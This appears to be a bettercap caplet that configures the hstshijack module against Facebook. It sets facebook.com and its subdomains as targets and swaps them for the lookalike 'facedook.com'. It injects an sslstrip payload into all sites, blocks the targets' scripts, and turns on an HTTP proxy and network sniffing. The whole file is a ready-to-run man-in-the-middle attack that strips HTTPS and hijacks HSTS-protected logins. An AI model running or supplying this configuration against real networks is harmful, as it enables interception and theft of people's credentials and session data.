# Documentation can be found at https://github.com/bettercap/blob/master/hstshijack/README.md

set hstshijack.log             hstshijack/ssl.log
set hstshijack.payload         hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         facebook.com,*.facebook.com
set hstshijack.replacements    facedook.com,*.facedook.com
set hstshijack.blockscripts    facebook.com,*.facebook.com
set hstshijack.custompayloads  *:hstshijack/payloads/sslstrip.js

set http.proxy.script  hstshijack/hstshijack.js
#set net.sniff.output   hstshijack0001.pcap
set net.sniff.verbose  false
net.sniff   on
http.proxy  on
